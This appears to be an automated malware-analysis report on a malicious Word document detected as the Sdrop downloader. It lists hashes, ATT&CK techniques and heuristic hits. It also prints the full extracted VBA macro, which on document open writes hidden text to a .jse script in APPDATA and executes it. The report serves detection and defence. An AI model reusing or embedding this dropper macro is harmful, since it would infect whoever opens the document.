Office (OOXML) malware analysis — malicious · 7369267cea1a22c8

MALICIOUS

Office (OOXML)

90.4 KB Created: 2019-10-27 18:57:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-02-04

MD5: 1f80e20f5f359a11f79617c818467328 SHA-1: 4820975bd50b83312114060d441ca74615facac8 SHA-256: 7369267cea1a22c8ffc8ec72fde0fc15653dc2cecd024f13b80cf44c6fd51fac

238 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious OOXML document containing a VBA project with a Document_Open macro. This macro uses CreateObject and Environ calls, indicating it is designed to execute code, likely to download a secondary payload. The ClamAV detection confirms its malicious nature, classifying it as Sdrop, a known downloader family.

Heuristics 7

ClamAV: Doc.Malware.Sdrop-7482473-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sdrop-7482473-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
  CreateObject(getData).ShellExecute searchP
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Randomize
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
 searchP = Environ("APPDATA")
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	6720 bytes
SHA-256: `0747a05739d5c5ff51249834d1314e891dc543ae07aca3eb7f7559cd1a65fd9e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function getData() Dim btnCap As String Dim o3985 As Long o3985 = 2821992 Dim t5gOMYUs1 As Long t5gOMYUs1 = 26423 btnCap = Fr1.BtnOk.Caption Dim sB92N2d As Boolean sB92N2d = False Dim QBmD0a243Z0r As Boolean QBmD0a243Z0r = False getData = Mid(btnCap, 5, 17) End Function Sub BreakOnSection() 'Used to set criteria for moving through the document by section. Application.Browser.Target = wdBrowseSection Dim FGjja596JFP As String FGjja596JFP = "noun hurt live team egg actual sport identity corn capital species habit read game region cutting rubber repeat built arrangement answer forth rays gently all cave easier basic jar additional standard receive exclaimed off believed central dig tower flew successful themselves food breath building ants various wire bush afternoon mass steel no long cake get television own there smile edge goes heat evening pan sister account cowboy raise dig continent frog thing pack pain rod beneath shaking get happen lack led mouse frozen lack however enough therefore leaving eye plastic electricity settlers mountain recent lucky advice similar properly mental support than pattern about learn soil piano having expect period first paid laugh wooden instant sets remarkable decide air" 'A mailmerge document ends with a section break next page. 'Subtracting one from the section count stop error message. For i = 1 To ((ActiveDocument.Sections.Count) - 1) 'Select and copy the section text to the clipboard ActiveDocument.Bookmarks("\Section").Range.Copy 'Create a new document to paste text from clipboard. Documents.Add Selection.Paste 'Removes the break that is copied at the end of the section, if any. Selection.MoveUp Unit:=wdLine, Count:=1, Extend:=wdExtend Selection.Delete Unit:=wdCharacter, Count:=1 ChangeFileOpenDirectory "C:\" DocNum = DocNum + 1 ActiveDocument.SaveAs FileName:="test_" & DocNum & ".doc" ActiveDocument.Close 'Move the selection to the next section in the document Application.Browser.Next Next i ActiveDocument.Close savechanges:=wdDoNotSaveChanges End Sub Private Function getAnwser() Dim warn As String warn = FR2.Buga.Caption Dim collectData As Range Dim ba8Op1m As String ba8Op1m = "speed weight position station wise metal courage eventually voice experience dug plane sides cup nothing at joined arm future gently generally though sight minute cast day began snake perfect has friend equally since recent money solid source nails writer habit cool wise trap natural friendly sand easy cheese collect floating written walk let rock divide what army little become straight newspaper eager get better lips equipment pool dawn settle liquid suggest further night empty sitting bite picture held breathe allow flew excited speed someone where furniture whether continued chose grade were along introduced square thread fierce pool box effort breeze news dirty fill effort burst wrapped rest swim event stick invented gulf kill sat basic cover nor block fifty another" Set collectData = ActiveDocument.Tables(1).Cell(1, 1).Range collectData.TextRetrievalMode.IncludeHiddenText = True getAnwser = Mid(collectData.Text, 1, Len(collectData.Text) - 2) End Function Private Sub Document_Open() Randomize Dim searchP As String searchP = Environ("APPDATA") searchP = searchP & "\" Dim b1oG2 As Long b1oG2 = 160738 Dim YEM0hS95by4 As Long YEM0hS95by4 = 1067 searchP = searchP & Rnd searchP = searchP & ".jse" Dim C1smPunf4M As String C1smPunf4M = "sugar sand nodded birds string harbor tone army wore firm wore necessary lamp gun hunt store funny kind ago station case behavior experience world being engineer disappear castle smaller golden basis higher tired kids check into solar close camera powerful idea event sugar design sing outer if fierce entire younger seven require instead got noise union eight border ground machinery trip highest held rose directly sold person receive moment native birth herd shake duck garage look bad chair near leader beginning easier airplane eight tax surprise directly write becoming children value return dot due understanding nine twenty minerals quite attempt behavior five noted cowboy wave team forgotten silver volume minute lose movie see paid poet warn kept condition mental rule" Open searchP For Output As #98 Print #98, getAnwser Close #98 CreateObject(getData).ShellExecute searchP End Sub Sub MyFindNext() Dim tL9o0839 As String tL9o0839 = "see tales yard every especially children poem bean wonder alive power ready slept breakfast brief smaller jungle until chapter mail carefully audience source principle automobile cap dug long rubber won muscle team bat breeze vegetable known wash father connected busy rough addition slip happen row mission greatly given end sheep wrong magnet trick beginning record hard surrounded truth relationship come dark scientific card discuss root exactly during baby ourselves stand only describe pack football eat line research perhaps according frame truck weak cave composed ride front farm breakfast courage rocket property airplane substance simply different stick glass protection hit wrapped brick outside" Application.ScreenUpdating = False Selection.Find.Execute ActiveDocument.Bookmarks.Add Range:=Selection.Range, Name:="MyFound" Selection.MoveUp Unit:=wdLine, Count:=3 Selection.GoTo What:=wdGoToBookmark, Name:="MyFound" ActiveDocument.Bookmarks("MyFound").Delete Application.ScreenUpdating = True End Sub Attribute VB_Name = "NewMacros" Sub p() End Sub Attribute VB_Name = "Fr1" Attribute VB_Base = "0{55994CD6-8CE7-458A-B7DC-AAD2E14B441D}{F1BA4FEB-260C-4B35-B62F-BF401C78FC46}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "FR2" Attribute VB_Base = "0{DCD88121-357A-45BD-AC02-3183BFA774F6}{58AC57F1-9DFE-4801-B025-22E72750939B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	32256 bytes
SHA-256: `bec89062c4502907228b05918899eec9ae447f31bb8c997a97c7f8f0247a04b0`
Detection ClamAV: Doc.Malware.Sdrop-7482473-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.